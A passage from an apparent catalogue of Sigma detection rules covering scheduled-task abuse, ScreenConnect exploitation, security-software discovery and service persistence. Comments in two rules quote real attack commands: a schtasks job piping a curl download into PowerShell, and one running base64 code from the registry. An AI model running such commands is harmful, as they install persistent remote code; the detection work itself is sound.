- Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
level: medium
Convert to SIEM query
medium
Scheduled Cron Task/Job - Linux
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
view Sigma YAML
title: Scheduled Cron Task/Job - Linux
id: 6b14bac8-3e3a-4324-8109-42f0546a347f
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Scheduled Cron Task/Job - MacOs
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
view Sigma YAML
title: Scheduled Cron Task/Job - MacOs
id: 7c3b43d8-d794-47d2-800a-d277715aa460
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Scheduled Task Creation From Potential Suspicious Parent Location
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
view Sigma YAML
title: Scheduled Task Creation From Potential Suspicious Parent Location
id: 9494479d-d994-40bf-a8b1-eea890237021
status: test
description: |
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
references:
- https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2024-05-13
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.005
- detection.threat-hunting
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|contains:
- ':\Temp\'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '\Temporary Internet'
- '\Users\Public\'
- '\Windows\Temp\'
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/Create '
filter_optional_common:
CommandLine|contains:
- 'update_task.xml'
- 'unattended.ini'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Software installers that run from temporary folders and also install scheduled tasks
level: medium
Convert to SIEM query
medium
Scheduled Task Creation with Curl and PowerShell Execution Combo
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
view Sigma YAML
title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_curl:
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
selection_powershell:
CommandLine|contains: 'powershell'
condition: all of selection_*
falsepositives:
- Legitimate use of schtasks for administrative purposes.
- Automation scripts combining curl and PowerShell in controlled environments.
level: medium
Convert to SIEM query
medium
Scheduled Task Executed From A Suspicious Location
Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
view Sigma YAML
title: Scheduled Task Executed From A Suspicious Location
id: 424273ea-7cf8-43a6-b712-375f925e481f
status: test
description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|contains:
- 'C:\Windows\Temp\'
- '\AppData\Local\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Users\Public\'
- 'C:\Temp\'
# If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it
# filter:
# TaskName: '\Exact\Task\Name'
# Path: 'Exact\Path'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Scheduled Task Executed Uncommon LOLBIN
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
view Sigma YAML
title: Scheduled Task Executed Uncommon LOLBIN
id: f0767f15-0fb3-44b9-851e-e8d9a6d0005d
status: test
description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|endswith:
- '\calc.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\mspaint.exe'
- '\notepad.exe'
- '\regsvr32.exe'
# - '\rundll32.exe'
- '\wscript.exe'
# filter_system:
# Path|endswith: '\rundll32.exe'
# TaskName|startswith: '\Microsoft\Windows\'
# condition: selection and not 1 of filter_*
condition: selection
falsepositives:
- False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule
level: medium
Convert to SIEM query
medium
Scheduled Task Executing Payload from Registry
Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
view Sigma YAML
title: Scheduled Task Executing Payload from Registry
id: 86588b36-c6d3-465f-9cee-8f9093e07798
related:
- id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78
type: derived
status: test
description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-18
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
# schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains: '/Create'
selection_cli_get:
CommandLine|contains:
- 'Get-ItemProperty'
- ' gp ' # Alias
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- 'HKEY_'
filter_main_encoding:
CommandLine|contains:
- 'FromBase64String'
- 'encodedcommand'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Screen Capture Activity Via Psr.EXE
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
view Sigma YAML
title: Screen Capture Activity Via Psr.EXE
id: 2158f96f-43c2-43cb-952a-ab4580f32382
status: test
description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Psr/
- https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: Beyu Denis, oscd.community
date: 2019-10-12
modified: 2024-01-04
tags:
- attack.collection
- attack.t1113
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\Psr.exe'
CommandLine|contains:
- '/start'
- '-start'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
ScreenConnect Temporary Installation Artefact
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
view Sigma YAML
title: ScreenConnect Temporary Installation Artefact
id: fec96f39-988b-4586-b746-b93d59fd1922
status: test
description: |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
author: frack113
date: 2022-02-13
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains: '\Bin\ScreenConnect.' # pattern to dll and jar file
condition: selection
falsepositives:
- Legitimate use
level: medium
Convert to SIEM query
medium
ScreenConnect User Database Modification
Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
view Sigma YAML
title: ScreenConnect User Database Modification
id: 1a821580-588b-4323-9422-660f7e131020
related:
- id: 4109cb6a-a4af-438a-9f0c-056abba41c6f
type: similar
status: test
description: |
Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
references:
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://www.cve.org/CVERecord?id=CVE-2024-1709
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
date: 2024-02-21
tags:
- attack.persistence
- cve.2024-1709
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '.xml'
TargetFilename|contains|all:
- 'Temp'
- 'ScreenConnect'
Image|endswith: '\ScreenConnect.Service.exe'
condition: selection
falsepositives:
- This will occur legitimately as well and will result in some benign activity.
level: medium
Convert to SIEM query
medium
ScreenConnect User Database Modification - Security
This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
view Sigma YAML
title: ScreenConnect User Database Modification - Security
id: 4109cb6a-a4af-438a-9f0c-056abba41c6f
related:
- id: 1a821580-588b-4323-9422-660f7e131020
type: similar
status: test
description: |
This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
references:
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://www.cve.org/CVERecord?id=CVE-2024-1709
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
author: Matt Anderson, Kris Luzadre, Andrew Schwartz, Huntress
date: 2024-02-20
tags:
- cve.2024-1709
- detection.emerging-threats
- attack.defense-impairment
logsource:
product: windows
service: security
definition: 'Requirements: SACLs must be enabled for the ScreenConnect directory'
detection:
selection:
EventID: 4663
ObjectType: 'File'
AccessMask: '0x6'
ObjectName|endswith: '.xml'
ObjectName|contains|all:
- 'Temp'
- 'ScreenConnect'
ProcessName|contains: 'ScreenConnect.Service.exe'
condition: selection
falsepositives:
- This will occur legitimately as well and will result in some benign activity.
level: medium
Convert to SIEM query
medium
ScreenSaver Registry Key Set
Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
view Sigma YAML
title: ScreenSaver Registry Key Set
id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce
status: test
description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
references:
- https://twitter.com/VakninHai/status/1517027824984547329
- https://twitter.com/pabraeken/status/998627081360695297
- https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
date: 2022-05-04
modified: 2023-08-17
tags:
- attack.stealth
- attack.t1218.011
logsource:
product: windows
category: registry_set
detection:
selection:
Image|endswith: '\rundll32.exe'
registry:
TargetObject|contains: '\Control Panel\Desktop\SCRNSAVE.EXE'
Details|endswith: '.scr'
filter:
Details|contains:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
condition: selection and registry and not filter
falsepositives:
- Legitimate use of screen saver
level: medium
Convert to SIEM query
medium
Scripted Diagnostics Turn Off Check Enabled - Registry
Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
view Sigma YAML
title: Scripted Diagnostics Turn Off Check Enabled - Registry
id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86
status: test
description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
references:
- https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'
date: 2022-06-15
modified: 2023-08-17
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|endswith: '\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck'
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Administrator actions
level: medium
Convert to SIEM query
medium
Scripting/CommandLine Process Spawned Regsvr32
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
view Sigma YAML
title: Scripting/CommandLine Process Spawned Regsvr32
id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
related:
- id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
type: obsolete
status: test
description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
references:
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
Image|endswith: '\regsvr32.exe'
filter_main_rpcproxy:
ParentImage: C:\Windows\System32\cmd.exe
CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
- Some legitimate Windows services
level: medium # Can be reduced to low if you experience a ton of FP
Convert to SIEM query
medium
Sdclt Child Processes
A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
view Sigma YAML
title: Sdclt Child Processes
id: da2738f2-fadb-4394-afa7-0a0674885afa
status: test
description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/6
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\sdclt.exe'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Security Software Discovery - MacOs
Detects usage of system utilities (only grep for now) to discover security software discovery
view Sigma YAML
title: Security Software Discovery - MacOs
id: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0
status: test
description: Detects usage of system utilities (only grep for now) to discover security software discovery
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-27
tags:
- attack.discovery
- attack.t1518.001
logsource:
category: process_creation
product: macos
detection:
image:
Image: '/usr/bin/grep'
selection_cli_1:
CommandLine|contains:
- 'nessusd' # nessus vulnerability scanner
- 'santad' # google santa
- 'CbDefense' # carbon black
- 'falcond' # crowdstrike falcon
- 'td-agent' # fluentd log shipper
- 'packetbeat' # elastic network logger/shipper
- 'filebeat' # elastic log file shipper
- 'auditbeat' # elastic auditing agent/log shipper
- 'osqueryd' # facebook osquery
- 'BlockBlock' # Objective-See persistence locations watcher/blocker
- 'LuLu' # Objective-See firewall management utility
selection_cli_2: # Objective Development Software firewall management utility
CommandLine|contains|all:
- 'Little'
- 'Snitch'
condition: image and 1 of selection_cli_*
falsepositives:
- Legitimate activities
level: medium
Convert to SIEM query
medium
Security Software Discovery Via Powershell Script
Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes.
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
view Sigma YAML
title: Security Software Discovery Via Powershell Script
id: 904e8e61-8edf-4350-b59c-b905fc8e810c
status: test
description: |
Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes.
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell
author: frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-16
modified: 2023-10-24
tags:
- attack.discovery
- attack.t1518.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
ScriptBlockText|contains:
- 'get-process | \?'
- 'get-process | where'
- 'gps | \?'
- 'gps | where'
selection_field:
ScriptBlockText|contains:
- 'Company -like'
- 'Description -like'
- 'Name -like'
- 'Path -like'
- 'Product -like'
selection_keywords:
ScriptBlockText|contains:
# Note: These strings are using wildcard assuming the search is using the "-like" operator.
# You can add specific variant with the actual process names to increase coverage
- '\*avira\*'
- '\*carbonblack\*'
- '\*cylance\*'
- '\*defender\*'
- '\*kaspersky\*'
- '\*malware\*'
- '\*sentinel\*'
- '\*symantec\*'
- '\*virus\*'
condition: all of selection_*
falsepositives:
- False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.
- As the "selection_cmdlet" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced
level: medium
Convert to SIEM query
medium
Security Tools Keyword Lookup Via Findstr.EXE
Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
This detection focuses on the keywords that the attacker might use as a filter.
view Sigma YAML
title: Security Tools Keyword Lookup Via Findstr.EXE
id: 4fe074b4-b833-4081-8f24-7dcfeca72b42
related:
- id: fe63010f-8823-4864-a96b-a7b4a0f7b929
type: derived
status: test
description: |
Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
This detection focuses on the keywords that the attacker might use as a filter.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
- https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2023-10-20
modified: 2023-11-14
tags:
- attack.discovery
- attack.t1518.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\find.exe'
- '\findstr.exe'
- OriginalFileName:
- 'FIND.EXE'
- 'FINDSTR.EXE'
selection_cli:
CommandLine|endswith:
# Note: Add additional keywords to increase and enhance coverage
# Note:
# We use the double quote variation because in cases of where the command is executed through cmd for example:
# cmd /c "tasklist | findstr virus"
# Logging utilties such as Sysmon would capture the end quote as part of findstr execution
- ' avira'
- ' avira"'
- ' cb'
- ' cb"'
- ' cylance'
- ' cylance"'
- ' defender'
- ' defender"'
- ' kaspersky'
- ' kaspersky"'
- ' kes'
- ' kes"'
- ' mc'
- ' mc"'
- ' sec'
- ' sec"'
- ' sentinel'
- ' sentinel"'
- ' symantec'
- ' symantec"'
- ' virus'
- ' virus"'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml
simulation:
- type: atomic-red-team
name: Security Software Discovery
technique: T1518.001
atomic_guid: f92a380f-ced9-491f-b338-95a991418ce2
Convert to SIEM query
medium
Self Extraction Directive File Created In Potentially Suspicious Location
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
view Sigma YAML
title: Self Extraction Directive File Created In Potentially Suspicious Location
id: 760e75d8-c3b5-409b-a9bf-6130b4c4603f
related:
- id: ab90dab8-c7da-4010-9193-563528cfa347
type: derived
status: test
description: |
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
references:
- https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html
- https://en.wikipedia.org/wiki/IExpress
- https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-02-05
tags:
- attack.stealth
- attack.t1218
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains:
- ':\ProgramData\'
- ':\Temp\'
- ':\Windows\System32\Tasks\'
- ':\Windows\Tasks\'
- ':\Windows\Temp\'
- '\AppData\Local\Temp\'
TargetFilename|endswith: '.sed'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Service Binary in User Controlled Folder
Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
Attackers often use such directories for staging purposes.
This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
view Sigma YAML
title: Service Binary in User Controlled Folder
id: 277dc340-0540-42e7-8efb-5ff460045e07
related:
- id: c625c4c2-515d-407f-8bb6-456f65955669
type: obsolete
status: test
description: |
Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
Attackers often use such directories for staging purposes.
This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-05-02
modified: 2024-03-25
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.threat-hunting
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains|all:
- 'ControlSet'
- '\Services\'
TargetObject|endswith: '\ImagePath'
Details|contains:
- ':\ProgramData\'
- '\AppData\Local\'
- '\AppData\Roaming\'
filter_optional_zoom:
TargetObject|contains: '\Services\ZoomCptService'
Details|contains: 'C:\Program Files\Common Files\Zoom\Support\CptService.exe'
filter_optional_mbami:
TargetObject|contains: '\Services\MBAMInstallerService'
Details|contains|all:
- 'C:\Users\'
- 'AppData\Local\Temp\MBAMInstallerService.exe'
filter_main_windefend:
TargetObject|contains:
- '\Services\WinDefend\'
- '\Services\MpKs'
Details|contains: 'C:\ProgramData\Microsoft\Windows Defender\'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Service Installation in Suspicious Folder
Detects service installation in suspicious folder appdata
view Sigma YAML
title: Service Installation in Suspicious Folder
id: 5e993621-67d4-488a-b9ae-b420d08b96cb
status: test
description: Detects service installation in suspicious folder appdata
author: pH-T (Nextron Systems)
references:
- Internal Research
date: 2022-03-18
modified: 2024-01-18
tags:
- attack.persistence
- attack.privilege-escalation
- car.2013-09-005
- attack.t1543.003
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ImagePath|contains:
- '\AppData\'
- '\\\\127.0.0.1'
- '\\\\localhost'
filter_optional_zoom:
ServiceName: 'Zoom Sharing Service'
ImagePath|contains: ':\Program Files\Common Files\Zoom\Support\CptService.exe'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Service Reconnaissance Via Wmic.EXE
An adversary might use WMI to check if a certain remote service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
view Sigma YAML
title: Service Reconnaissance Via Wmic.EXE
id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
related:
- id: 68bcd73b-37ef-49cb-95fc-edc809730be6
type: similar
status: test
description: |
An adversary might use WMI to check if a certain remote service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
- https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-service
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-14
modified: 2026-01-07
tags:
- attack.execution
- attack.t1047
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_cli:
CommandLine|contains: 'service'
filter_main_win32_methods:
CommandLine|contains:
- 'Change'
- 'Create'
- 'Delete'
- 'PauseService'
- 'ResumeService'
- 'SetSecurityDescriptor'
- 'StartService'
- 'StopService'
- 'UserControlService'
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Service Registry Permissions Weakness Check
